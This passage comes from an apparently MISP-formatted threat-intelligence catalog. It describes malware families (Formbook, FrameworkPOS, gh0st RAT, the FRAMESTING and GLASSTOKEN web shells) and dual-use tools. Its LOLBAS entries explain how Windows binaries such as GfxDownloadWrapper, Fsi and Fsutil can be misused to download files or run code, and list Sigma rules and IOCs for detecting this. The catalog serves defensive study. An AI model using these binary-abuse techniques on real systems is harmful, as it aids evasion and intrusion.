software_attack_id | S0193 |
source | MITRE |
tags | ['91804406-e20a-4455-8dbc-5528c35f8e20', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Formbook
Formbook is an information-stealing malware, discovered in 2016, that is capable of stealing data entered into HTML website forms, logging keystrokes, and acting as a downloader for other malware.[What Is FormBook Malware?][What is FormBook Malware? - Check Point Software] xLoader is a JavaScript-based, cross-platform Formbook variant discovered in 2020 that is crafted to infect macOS as well as Windows systems. Check Point Research's 2022 Mid-Year Report, released in August 2022, placed Formbook as the "most prevalent" infostealer malware globally (and the second-most prevalent of all malware types globally, behind only Emotet).[Check Point Mid-Year Report 2022]
Internal MISP references
UUID 376d1383-17a7-48b0-8a8b-d6142b2f3003
which can be used as unique global reference for Formbook
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5288 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
FRAMESTING
FRAMESTING is a Python web shell that was used during Cutting Edge to embed into an Ivanti Connect Secure Python package for command execution.[Mandiant Cutting Edge Part 2 January 2024]
Internal MISP references
UUID 83721b89-df58-50bf-be2a-0b696fb0da78
which can be used as a unique global reference for FRAMESTING
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1120 |
source | MITRE |
type | ['malware'] |
FrameworkPOS
FrameworkPOS is a point of sale (POS) malware used by FIN6 to steal payment card data from systems that run physical POS devices.[SentinelOne FrameworkPOS September 2019]
Internal MISP references
UUID aef7cbbc-5163-419c-8e4b-3f73bed50474
which can be used as a unique global reference for FrameworkPOS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0503 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FreeFileSync
FreeFileSync is a tool used to facilitate cloud-based file synchronization.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 1d5c5822-3cb4-455a-9976-f6bc17e2820d
which can be used as a unique global reference for FreeFileSync
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5032 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
FruitFly
FruitFly is designed to spy on Mac users.[objsee mac malware 2017]
Internal MISP references
UUID 3a05085e-5a1f-4a74-b489-d679b80e2c18
which can be used as a unique global reference for FruitFly
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0277 |
source | MITRE |
type | ['malware'] |
Fsi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
Author: Jimmy (@bohops)
Paths: * C:\Program Files\dotnet\sdk[sdk version]\FSharp\fsi.exe * C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
Resources: * https://twitter.com/NickTyrer/status/904273264385589248 * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection: * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Fsi.exe execution may be suspicious on non-developer machines * Sigma: proc_creation_win_lolbin_fsharp_interpreters.yml[Fsi.exe - LOLBAS Project]
Internal MISP references
UUID f2a5e6cb-75fd-4108-9466-80471c7d0422
which can be used as a unique global reference for Fsi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5222 |
source | Tidal Cyber |
tags | ['7a4b56fa-5419-411b-86fe-68c9b0ddd3c5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
FsiAnyCpu
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
Author: Jimmy (@bohops)
Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Resources: * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines * Sigma: proc_creation_win_lolbin_fsharp_interpreters.yml[FsiAnyCpu.exe - LOLBAS Project]
Internal MISP references
UUID 9e5c41bb-f4cc-4132-8c7a-4a10a006190b
which can be used as a unique global reference for FsiAnyCpu
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5223 |
source | Tidal Cyber |
tags | ['c5d1a687-8a36-4995-b8cb-415f33661821', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Fsutil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: File System Utility
Author: Elliot Killick
Paths: * C:\Windows\System32\fsutil.exe * C:\Windows\SysWOW64\fsutil.exe
Resources: * https://twitter.com/0gtweet/status/1720724516324704404
Detection: * IOC: fsutil.exe should not be run on a normal workstation * IOC: file setZeroData (not case-sensitive) in the process arguments * IOC: Sysmon Event ID 1 * IOC: Execution of process fsutil.exe with trace decode could be suspicious * IOC: Non-Windows netsh.exe execution * Sigma: proc_creation_win_susp_fsutil_usage.yml[Fsutil.exe - LOLBAS Project]
Internal MISP references
UUID 7a829dae-00cf-4321-95b4-276f7dfb5368
which can be used as a unique global reference for Fsutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5112 |
source | Tidal Cyber |
tags | ['76bb7541-94da-4d66-9a57-77f788330287', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ftp
ftp is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.[Microsoft FTP][Linux FTP]
Internal MISP references
UUID 062deac9-8f05-44e2-b347-96b59ba166ca
which can be used as a unique global reference for ftp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0095 |
source | MITRE |
tags | ['95d37388-4e95-4d7f-96ba-99d94c842299', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
FunnyDream
FunnyDream is a backdoor with multiple components that was used during the FunnyDream campaign since at least 2019, primarily for execution and exfiltration.[Bitdefender FunnyDream Campaign November 2020]
Internal MISP references
UUID d0490e1d-8287-44d3-8342-944d1203b237
which can be used as a unique global reference for FunnyDream
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1044 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
FYAnti
FYAnti is a loader that has been used by menuPass since at least 2020, including to deploy QuasarRAT.[Securelist APT10 March 2021]
Internal MISP references
UUID be9a2ae5-373a-4dee-9c1e-b54235dafed0
which can be used as a unique global reference for FYAnti
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0628 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Fysbis
Fysbis is a Linux-based backdoor used by APT28 that dates back to at least 2014.[Fysbis Palo Alto Analysis]
Internal MISP references
UUID 317a7647-aee7-4ce1-a8f8-33a61190f55d
which can be used as a unique global reference for Fysbis
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0410 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Gazer
Gazer is a backdoor used by Turla since at least 2016. [ESET Gazer Aug 2017]
Internal MISP references
UUID 7a60b984-b0c8-4acc-be24-841f4b652872
which can be used as a unique global reference for Gazer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0168 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Gelsemium
Gelsemium is modular malware consisting of a dropper (Gelsemine), a loader (Gelsenicine), and main plug-ins (Gelsevirine), written using the Microsoft Foundation Class (MFC) framework. Gelsemium has been used by the Gelsemium group since at least 2014.[ESET Gelsemium June 2021]
Internal MISP references
UUID 9a117508-1d22-4fea-aa65-db670c13a5c9
which can be used as a unique global reference for Gelsemium
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0666 |
source | MITRE |
type | ['malware'] |
GeminiDuke
GeminiDuke is malware that was used by APT29 from 2009 to 2012. [F-Secure The Dukes]
Internal MISP references
UUID 97f32f68-dcd2-4f80-9967-cc87305dc342
which can be used as a unique global reference for GeminiDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0049 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Get2
Get2 is a downloader written in C++ that has been used by TA505 to deliver FlawedGrace, FlawedAmmyy, Snatch and SDBbot.[Proofpoint TA505 October 2019]
Internal MISP references
UUID a997aaaf-edfc-4489-80a9-3f8d64545de1
which can be used as a unique global reference for Get2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0460 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GfxDownloadWrapper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Remote file download utility used by the Intel Graphics Control Panel; it takes a URL as its first parameter and a destination file path as its second.
Author: Jesus Galvez
Paths: * c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\ * c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\ * c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\ * 
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\ * 
c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\ * 
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ * 
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ * 
c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ * c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ * c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ * c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ * c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ * c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ * c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ * c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ * c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ * c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ * c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ * c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ * c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ * c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ * c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ * c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ * c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ * c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ * c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ * c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ * c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ * 
c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ * c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ * c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ * c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ * c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ * c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ * c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ * c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ * c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ * c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ * c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ * c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ * c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ * c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ * c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ * c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ * c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ * c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ * c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
Resources: * https://www.sothis.tech/author/jgalvez/
Detection: * Sigma: proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml * IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.[GfxDownloadWrapper.exe - LOLBAS Project]
Internal MISP references
UUID a83cfdbf-023a-4874-a3d8-9674149ceb53
which can be used as a unique global reference for GfxDownloadWrapper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5186 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
gh0st RAT
gh0st RAT is a remote access tool (RAT). The source code is public and it has been used by multiple groups.[FireEye Hacking Team][Arbor Musical Chairs Feb 2018][Nccgroup Gh0st April 2018]
Internal MISP references
UUID 269ef8f5-35c8-44ba-afe4-63f4c6431427
which can be used as a unique global reference for gh0st RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Windows'] |
software_attack_id | S0032 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GLASSTOKEN
GLASSTOKEN is a custom web shell used by threat actors during Cutting Edge to execute commands on compromised Ivanti Secure Connect VPNs.[Volexity Ivanti Zero-Day Exploitation January 2024]
Internal MISP references
UUID 5c1a1ce5-927c-5c79-8a14-2789756d41ee
which can be used as a unique global reference for GLASSTOKEN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1117 |
source | MITRE |
type | ['malware'] |
GLOOXMAIL
GLOOXMAIL is malware used by APT1 that mimics legitimate Jabber/XMPP traffic. [Mandiant APT1]
Internal MISP references
UUID 09fdec78-5253-433d-8680-294ba6847be9
which can be used as a unique global reference for GLOOXMAIL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0026 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GMER
GMER is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 83713f85-8b2f-4733-9fea-e6a1494d0bbb
which can be used as a unique global reference for GMER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5033 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Gold Dragon
Gold Dragon is a Korean-language data-gathering implant that was first observed in the wild in South Korea in July 2017. Gold Dragon was used along with Brave Prince and RunningRAT in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. [McAfee Gold Dragon]
Internal MISP references
UUID 348fdeb5-6a74-4803-ac6e-e0133ecd7263
which can be used as a unique global reference for Gold Dragon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
